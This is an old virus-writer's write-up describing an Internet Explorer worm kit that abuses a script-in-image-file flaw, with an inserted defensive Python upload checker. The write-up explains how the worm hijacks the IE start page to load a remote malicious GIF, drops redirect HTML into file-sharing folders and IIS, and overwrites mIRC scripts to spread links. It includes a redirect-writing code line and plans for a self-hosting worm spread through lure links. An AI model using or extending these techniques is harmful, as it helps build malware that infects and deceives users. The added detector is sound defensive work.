IE Media Files w0rm kit
(Backdoor.Win32.IRCBot.mw)
(Backdoor.Win32.IRCBot.on)

by dav

Written in Delphi

Released in December 2005


Intro

Sven Vetsch found a cross-site scripting vulnerability in Microsoft Internet Explorer.
It's possible to run arbitrary script code. The problem lies in the handling of the content of such files.
In the first place the usual file header (e.g. GIF) is provided. The remaining content of the file
can be ordinary HTML data plus JavaScript/Visual Basic Script (for VBS, ActiveX must be enabled!)

Worm Description

My w0rm defines a new IE start page. If the victim starts IE, IE will always load the w0rm.gif
(on my webserver) -> w0rm start routine!
Unfortunately the gif bug only works when IE streams the gif from a web server over HTTP or HTTPS!
The malicious gif can't be executed locally or included in other html pages. Therefore I had to write
a new spreading technique. It makes no sense to drop a copy of the w0rm. So I decided that my w0rm
creates html files on the victim machine with one meta tag line ->
	w.WriteLine "<meta http-equiv='refresh' content='0;URL=" & url & "'>" 
The idea is simple. Drop html files containing a redirection to our webserver and spread these html files
over file sharing folders (Kazaa, P2P) and IIS (if installed). My w0rm also overwrites (if it exists) the
mIRC script.ini with some new lines. Why no DCC spreading script? Simply because the chance is much higher
that the w0rm infects more machines by sending the link across IRC instead of sending html files.




Malicious JPG, PDF, PNG, AVI, ...

It's possible to put/hide your w0rm in every kind of file (jpg, gif, pdf, png, avi, ...). I tried it and it works! (all IE versions)
Open your notepad and type:
	<script type="text/javascript">alert("the vx scene never dies!")</script>
Save it as *.jpg, *.pdf, ... ;)
It isn't necessary to write the usual file header (e.g. GIF) at the start!
Just put your js/vbs c0de in such a file, upload it and... :).
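The bug described in the Intro and in this section comes down to a browser trusting an image extension over the bytes it receives. The following server-side check is an added example, not part of dav's kit: it compares a file's claimed extension with its leading bytes and looks for HTML/script markup in the head of the file, the two conditions behind both the header-plus-script "w0rm.gif" case and the bare-script-saved-as-.jpg case. The magic-byte table, marker list and sample files are constructed for the example.

```python
import re

# Leading bytes for the container types the text names (constructed table, not exhaustive).
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "pdf": (b"%PDF-",),
    "avi": (b"RIFF",),
}

# Markup that a content-sniffing browser would treat as HTML or script.
HTML_MARKERS = re.compile(
    rb"<\s*(script|meta\s+http-equiv|object|iframe|body|html)\b|(javascript|vbscript)\s*:",
    re.IGNORECASE,
)


def inspect_upload(name: str, data: bytes, sniff_len: int = 512) -> dict:
    """Classify a file by its claimed extension versus its actual bytes.

    verdict is one of:
      "ok"              header matches the extension, no markup in the head
      "polyglot"        valid header followed by markup (header-then-script case)
      "html_payload"    markup in the head and no valid header (script saved as .jpg)
      "header_mismatch" no markup, but the header does not match the extension
    """
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    header_ok = any(data.startswith(m) for m in MAGIC.get(ext, ()))
    html_in_head = HTML_MARKERS.search(data[:sniff_len]) is not None
    if html_in_head:
        verdict = "polyglot" if header_ok else "html_payload"
    else:
        verdict = "ok" if header_ok else "header_mismatch"
    return {"ext": ext, "header_ok": header_ok, "html_in_head": html_in_head, "verdict": verdict}


# Constructed samples modelled on the text: a GIF header followed by script,
# a bare script saved as .jpg, and a clean GIF.
SAMPLES = {
    "w0rm.gif": b"GIF89a" + bytes(7) + b"<script>alert(1)</script>",
    "photo.jpg": b'<script type="text/javascript">alert("x")</script>',
    "clean.gif": b"GIF89a" + bytes(16),
}


def scan_samples(samples: dict = SAMPLES) -> dict:
    """Return {filename: verdict} for every sample; anything but "ok" should be rejected."""
    return {name: inspect_upload(name, data)["verdict"] for name, data in samples.items()}
```

Later IE releases and other browsers honour the X-Content-Type-Options: nosniff response header, which did not exist when this text was written; a byte-level check like this one is the server-side complement for uploads.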



New Idea

I guess you noticed that my sample script is not exactly a real w0rm, but
we could write a w0rm with the following features:

- the w0rm drops a copy of itself as jpg, gif, pdf, png, avi, ... and carries a binary version of
a simple webserver inside itself (embedded with chr())
- spreading the host's IP over mail?/irc/im?
  -> e.g. "hey buddy look at this :D, http://192.168.172.23/sexy/blondfuck.avi"

dav



tested on Windows XP
February 17, 2007

MegaSecurity